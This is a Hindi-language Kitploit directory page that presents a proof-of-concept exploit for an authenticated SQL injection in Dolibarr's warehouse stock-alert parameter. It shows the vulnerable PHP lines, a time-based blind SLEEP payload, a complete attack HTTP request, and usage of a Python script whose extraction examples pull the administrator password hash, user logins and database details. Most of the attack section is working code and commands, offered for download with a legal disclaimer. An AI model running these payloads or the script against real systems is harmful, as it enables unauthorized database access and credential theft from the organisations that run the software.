Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-78804_Dolibarr_authenticated_SQL_injection — प्रति-वेयरहाउस स्टॉक अलर्ट थ्रेशोल्ड (`seuil_stock_alerte`) सेट करने के लिए जिम्मेदार एक्शन उपयोगकर्ता-नियंत्रित इनपुट स्वीकार करता है और बाद में उचित न्यूमेरिक कास्टिंग या पैरामीटर बाइंडिंग के बिना इसे SQL क्वेरी में शामिल करता है। #dolibarr #exploit | Kitploit
उपकरण/GitHubGitHub/repo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection
भेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubrepo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection

CVE-2026-78804_Dolibarr_authenticated_SQL_injection

प्रति-वेयरहाउस स्टॉक अलर्ट थ्रेशोल्ड (`seuil_stock_alerte`) सेट करने के लिए जिम्मेदार एक्शन उपयोगकर्ता-नियंत्रित इनपुट स्वीकार करता है और बाद में उचित न्यूमेरिक कास्टिंग या पैरामीटर बाइंडिंग के बिना इसे SQL क्वेरी में शामिल करता है। #dolibarr #exploit

रिपॉजिटरी देखें
16घं 21मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Dolibarr — प्रमाणित SQL इंजेक्शन PoC

seuil_stock_alerte पैरामीटर के माध्यम से उत्पाद स्टॉक प्रबंधन कार्यक्षमता को प्रभावित करने वाला SQL इंजेक्शन।

प्रभावित संस्करण

परीक्षण और पुष्टि की गई:

  • 19.0.4
  • 20.0.4
  • 21.0.4
  • 22.0.5
  • 23.0.3
  • 24.0.0 (रिपोर्ट तक यह काम कर रहा था।)

संवेदनशील पैरामीटर

seuil_stock_alerte

पैरामीटर इनके द्वारा स्वीकार किया जाता है:

root@kitploit:~
/product/stock/product.php

addlimitstockwarehouse क्रिया का उपयोग करते हुए।

शोषण

पैरामीटर को बिना संख्यात्मक रूपांतरण के प्राप्त किया जाता है:

root@kitploit:~
$seuil_stock_alerte = GETPOST('seuil_stock_alerte');

$pse->seuil_stock_alerte = $seuil_stock_alerte;

इसके बाद यह सीधे स्ट्रिंग संयोजन के माध्यम से एक SQL कथन तक पहुँचता है:

root@kitploit:~
$sql .= ' seuil_stock_alerte = '.
    (isset($this->seuil_stock_alerte)
        ? $this->seuil_stock_alerte
        : "null").',';

चूंकि मान को एक बिना उद्धरण वाले संख्यात्मक संदर्भ में डाला जाता है, एक नियमित संख्यात्मक मान के बजाय एक SQL अभिव्यक्ति प्रदान की जा सकती है।

समय-आधारित ब्लाइंड SQL इंजेक्शन

निष्पादन प्रदर्शित करने के लिए एक बूलियन/समय-आधारित अभिव्यक्ति पर्याप्त है:

root@kitploit:~
(SELECT IF((1=1),SLEEP(15),0))

उदाहरण पैरामीटर:

root@kitploit:~
seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

एक सफल अनुरोध लगभग 15 सेकंड की HTTP प्रतिक्रिया देरी उत्पन्न करता है, जो इंजेक्ट की गई SQL अभिव्यक्ति के मूल्यांकन की पुष्टि करता है।

संवेदनशील अनुरोध

संवेदनशील क्रिया तक इस प्रकार के प्रमाणित अनुरोध के साथ पहुँचा जा सकता है:

root@kitploit:~
POST /product/stock/product.php?id=1 HTTP/1.1
Host: target
Cookie: DOLSESSID_xxxxx=<session>
Content-Type: application/x-www-form-urlencoded

action=addlimitstockwarehouse&token=<csrf>&id=1&fk_entrepot=1&desiredstock=1&seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

आवश्यकताएँ:

  • वैध प्रमाणित सत्र
  • CSRF टोकन (उत्पाद कार्ड पृष्ठ से निकाला गया)
  • उत्पाद ID
  • वेयरहाउस ID

प्रमाणीकरण और विशेषाधिकार

यह समस्या एक प्रमाणित खाते के साथ पुनरुत्पादित की गई थी जिसके पास केवल:

root@kitploit:~
Product → Create (produit/creer)

अनुमति थी — एक निम्न-विशेषाधिकार वाला खाता जो उत्पाद बना सकता है।

प्रभाव

SQL इंजेक्शन निम्नलिखित को सक्षम बनाता है:

  1. ब्लाइंड समय-आधारित SQL इंजेक्शन — SLEEP देरी के माध्यम से क्वेरी निष्पादित की जा सकती हैं
  2. सूचना प्रकटीकरण — डेटाबेस सामग्री को वर्ण-दर-वर्ण निकाला जा सकता है
  3. संभावित विशेषाधिकार वृद्धि — व्यवस्थापक क्रेडेंशियल या संवेदनशील डेटा निष्कर्षण
  4. डेटाबेस टोही — त्रुटि या समय-आधारित विधियों के माध्यम से स्कीमा गणना

इस सिस्टम पर डेटाबेस-स्तरीय बाधाओं ने सीधे OS कमांड निष्पादन को रोक दिया।

शोषण उपकरण

साथ में दी गई PoC स्क्रिप्ट stock_sqli_poc.py शोषण प्रक्रिया को स्वचालित करती है:

उपयोग

root@kitploit:~
python3 stock_sqli_poc.py \
  --url http://127.0.0.1:8088 \
  --proxy http://127.0.0.1:8080 \
  --login webeditor \
  --password 'WebEdit0r!' \
  --product-id 1 \
  --warehouse-id 1 \
  --extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)" \
  --length 14

विशेषताएँ

  • स्वचालित लॉगिन — लक्ष्य पर प्रमाणित करता है
  • इंजेक्शन पुष्टि — परीक्षण पेलोड (1=1 बनाम 1=2) के साथ SQL इंजेक्शन को मान्य करता है
  • बाइनरी खोज निष्कर्षण — ASCII तुलना का उपयोग करके कुशलतापूर्वक वर्ण-दर-वर्ण डेटा निकालता है
  • प्रॉक्सी समर्थन — Burp Suite या अन्य HTTP प्रॉक्सी के साथ एकीकृत होता है
  • कॉन्फ़िगर करने योग्य देरी — विश्वसनीयता के लिए SLEEP अवधि समायोजित करता है

कमांड-लाइन विकल्प

विकल्पडिफ़ॉल्टविवरण
--urlhttp://127.0.0.1:8088लक्ष्य Dolibarr इंस्टेंस URL
--proxyhttp://127.0.0.1:8080HTTP प्रॉक्सी (Burp, आदि)। अक्षम करने के लिए खाली स्ट्रिंग पर सेट करें
--loginwebeditorनिम्न-विशेषाधिकार खाते के लिए उपयोगकर्ता नाम
--passwordWebEdit0r!खाता पासवर्ड
--product-id1लक्षित करने के लिए उत्पाद ID
--warehouse-id1लक्षित करने के लिए वेयरहाउस ID
--delay1.0समय-आधारित पहचान के लिए SLEEP अवधि सेकंड में
--extract(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)निकालने के लिए SQL अभिव्यक्ति
--length14निकालने के लिए अधिकतम वर्ण लंबाई

निष्कर्षण उदाहरण

व्यवस्थापक पासवर्ड हैश निकालें:

root@kitploit:~
--extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)"

उपयोगकर्ताओं की गणना करें:

root@kitploit:~
--extract "(SELECT GROUP_CONCAT(login) FROM llx_user)"

डेटाबेस संस्करण:

root@kitploit:~
--extract "VERSION()"

वर्तमान डेटाबेस उपयोगकर्ता:

root@kitploit:~
--extract "USER()"

⚠️ कानूनी सूचना: इस शोषण का उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके लिए आपके पास स्पष्ट लिखित प्राधिकरण है। कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है। यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

टूल डाउनलोड करें